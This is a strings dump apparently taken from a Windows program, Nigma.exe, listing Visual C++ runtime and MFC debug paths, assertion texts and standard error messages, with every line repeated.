f:\dd\vctools\crt_bld\self_x86\crt\src\mbslwr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbslwr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbscoll.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbscoll.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fileno.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fileno.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ftell.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ftell.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fseek.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fseek.c
fMode == _CRTDBG_REPORT_MODE || (fMode & ~(_CRTDBG_MODE_FILE | _CRTDBG_MODE_DEBUG | _CRTDBG_MODE_WNDW)) == 0
fMode == _CRTDBG_REPORT_MODE || (fMode & ~(_CRTDBG_MODE_FILE | _CRTDBG_MODE_DEBUG | _CRTDBG_MODE_WNDW)) == 0
_CrtSetReportMode
_CrtSetReportMode
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c
nRptType >= 0 && nRptType
nRptType >= 0 && nRptType
wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")
strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")
_VCrtDbgReportA
_VCrtDbgReportA
strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")
strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")
wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
_VCrtDbgReportW
_VCrtDbgReportW
f:\dd\vctools\crt_bld\self_x86\crt\src\winsig.c
f:\dd\vctools\crt_bld\self_x86\crt\src\winsig.c
Wf:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\typname.cpp
Wf:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\typname.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\_filbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_filbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\localref.c
f:\dd\vctools\crt_bld\self_x86\crt\src\localref.c
((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))
((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))
f:\dd\vctools\crt_bld\self_x86\crt\src\write.c
f:\dd\vctools\crt_bld\self_x86\crt\src\write.c
f:\dd\vctools\crt_bld\self_x86\crt\src\lseeki64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\lseeki64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ftelli64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ftelli64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_freebuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_freebuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\commit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\commit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\expand.c
f:\dd\vctools\crt_bld\self_x86\crt\src\expand.c
f:\dd\vctools\crt_bld\self_x86\crt\src\isctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\isctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\close.c
f:\dd\vctools\crt_bld\self_x86\crt\src\close.c
f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\timeset.c
f:\dd\vctools\crt_bld\self_x86\crt\src\timeset.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stricmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stricmp.c
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
jwcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)
jwcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)
wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")
wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")
wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")
wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")
_NMSG_WRITE
_NMSG_WRITE
f:\dd\vctools\crt_bld\self_x86\crt\src\crt0msg.c
f:\dd\vctools\crt_bld\self_x86\crt\src\crt0msg.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncat_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncat_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\fwprintf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fwprintf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\errmode.c
f:\dd\vctools\crt_bld\self_x86\crt\src\errmode.c
f:\dd\vctools\crt_bld\self_x86\crt\src\vswprint.c
f:\dd\vctools\crt_bld\self_x86\crt\src\vswprint.c
f:\dd\vctools\crt_bld\self_x86\crt\src\intel\fp8.c
f:\dd\vctools\crt_bld\self_x86\crt\src\intel\fp8.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cvt.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cvt.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsncpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsncpy_s.inl
ADVAPI32.DLL
ADVAPI32.DLL
f:\dd\vctools\crt_bld\self_x86\crt\src\a_cmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\a_cmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stricoll.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stricoll.c
strcpy_s(resultstr, resultsize, autofos.man)
strcpy_s(resultstr, resultsize, autofos.man)
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cfout.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cfout.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strcoll.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strcoll.c
f:\dd\vctools\crt_bld\self_x86\crt\src\lseek.c
f:\dd\vctools\crt_bld\self_x86\crt\src\lseek.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbstowcs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbstowcs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\isatty.c
f:\dd\vctools\crt_bld\self_x86\crt\src\isatty.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowc.c
_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2
_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2
f:\dd\vctools\crt_bld\self_x86\crt\src\getqloc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\getqloc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\getenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\getenv.c
MSPDB100.DLL
MSPDB100.DLL
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\tran\contrlfp.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\tran\contrlfp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_fptostr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_fptostr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wctomb.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wctomb.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\x10fout.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\x10fout.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\include\strgtold12.inl
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\include\strgtold12.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbico.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbico.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicol.c
("CRT Logic error during setenv",0)
("CRT Logic error during setenv",0)
__crtsetenv
__crtsetenv
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atldebugapi.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atldebugapi.cpp
ppCategory && pfnCrtDbgReport
ppCategory && pfnCrtDbgReport
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomtime.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomtime.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcore.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcore.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atltime.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\atltime.inl
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\allocate.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\allocate.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atltracemodulemanager.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atltracemodulemanager.h
strcpy_s(errmsg, (94 38 2), _get_sys_err_msg(errnum))
strcpy_s(errmsg, (94 38 2), _get_sys_err_msg(errnum))
f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_open.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_open.c
f:\dd\vctools\crt_bld\self_x86\crt\src\open.c
f:\dd\vctools\crt_bld\self_x86\crt\src\open.c
0 && "Only UTF-16 little endian & UTF-8 is supported for reads"
0 && "Only UTF-16 little endian & UTF-8 is supported for reads"
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbicm.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbicm.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setmode.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setmode.c
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xutility
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xutility
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\deque
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\deque
std::_String_const_iterator,class std::allocator >::operator *
std::_String_const_iterator,class std::allocator >::operator *
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atltransactionmanager.h
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atltransactionmanager.h
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlbase.h
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlbase.h
m_hKey != 0
m_hKey != 0
hKeyParent != 0
hKeyParent != 0
Assertion failed: %s, file %s, line %d
Assertion failed: %s, file %s, line %d
{8856F961-340A-11D0-A96B-00C04FD705A2}
{8856F961-340A-11D0-A96B-00C04FD705A2}
All Files (*.*)
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]
%s [Recovered]
1.0.0.1
1.0.0.1
Nigma.exe
Nigma.exe